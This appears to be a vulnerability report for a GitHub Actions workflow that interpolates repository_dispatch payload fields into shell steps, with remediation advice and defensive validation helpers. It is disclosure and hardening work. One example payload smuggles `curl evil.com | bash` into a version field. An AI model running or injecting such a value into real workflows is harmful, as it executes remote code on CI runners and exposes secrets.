This repository was archived by the owner on May 18, 2026. It is now read-only.
Vulnerability: Script Injection via repository_dispatch Payload
CWE: CWE-77 (Command Injection)
Severity: High

Description

The update-azd-core.yml workflow uses repository_dispatch event payloads directly in GitHub Actions expression contexts (${{ }}), which are evaluated before the shell runs. Because any repository with a valid PAT can trigger repository_dispatch, the client_payload.version and client_payload.branch fields are attacker-controlled.

The version validation on line 59 (^v) is insufficient: a value like `v1" && curl evil.com | bash && echo "` would pass the check and execute arbitrary commands in the subsequent run: blocks (lines 74, 82, 94–95, 100, 110, 118–120).

Affected Files

| File | Lines |
| --- | --- |
| .github/workflows/update-azd-core.yml | 41–43, 52, 74, 82, 94–95, 100, 110, 118–120 |

Recommended Fix

- Store dispatch payload values in environment variables and reference them as shell variables instead of inline ${{ }} expressions.
- Strengthen version validation to require strict semver: ^v[0-9]+.[0-9]+.[0-9]+(-[a-zA-Z0-9.]+)?$
- Validate the branch name against a strict alphanumeric/dash pattern.
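The recommended fix, as an added example that is not code from the reported repository: validation helpers a hardened `run:` step could call once the payload is passed through `env:`, plus a side-by-side of why `${{ }}` interpolation is dangerous and variable passing is not. The `github.event.client_payload.*` key names in the comment, the escaped dots in the semver pattern, and the branch pattern are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not the reported repository's own code. Helpers that a
# hardened update-azd-core.yml could call from a `run:` step once the
# payload is passed through `env:` instead of interpolated with ${{ }}:
#
#   env:
#     VERSION: ${{ github.event.client_payload.version }}   # assumed key names
#     BRANCH:  ${{ github.event.client_payload.branch }}
#   run: |
#     validate_version "$VERSION" && validate_branch "$BRANCH" || exit 1

# Strict semver with a leading v. Dots are escaped here; the bare dots in
# the issue's pattern would also match strings such as v1a2b3.
validate_version() {
  printf '%s' "$1" | grep -Eq '^v[0-9]+\.[0-9]+\.[0-9]+(-[a-zA-Z0-9.]+)?$'
}

# Branch names: alphanumerics, dash, underscore, dot and slash only, with
# no leading dash so the value can never be parsed as a git option.
validate_branch() {
  printf '%s' "$1" | grep -Eq '^[A-Za-z0-9][A-Za-z0-9._/-]*$'
}

# Constructed stand-in for the payload in the report: passes the weak ^v
# check but carries a quoted command sequence (a harmless echo here).
PAYLOAD='v1" && echo INJECTED && echo "'

# What the runner does with ${{ }}: the value is pasted into the script
# text before the shell parses it, so the embedded && becomes syntax.
run_inline() {
  sh -c "echo \"$1\"" 2>/dev/null
}

# What happens with env/argument passing: the shell parses a fixed script
# and the value only ever arrives as data in "$1".
run_via_env() {
  sh -c 'echo "$1"' _ "$1"
}
```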